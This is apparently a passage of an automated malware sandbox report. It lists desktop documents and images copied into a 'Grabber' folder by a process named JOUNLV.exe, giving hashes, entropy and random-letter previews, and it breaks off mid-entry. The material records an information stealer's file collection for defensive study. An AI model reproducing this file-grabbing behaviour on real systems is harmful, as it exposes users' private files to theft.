                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX\WUTJSCBCFX.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX\YPSIACHYXW.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX\ZBEDCJPBEY.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW\CURQNKVOIX.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688505748329201
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                                                                                                                                                                                                                          MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                                                                                                                                                                                                                          SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                                                                                                                                                                                                                          SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                                                                                                                                                                                                                          SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW\JSDNGYCOWY.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW\NIKHQAIQAU.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW\RAYHIWGKDI.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69782189124949
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                                                                                                                                                                          MD5:0640503E533EFB11CC70F43D2FFF4E26
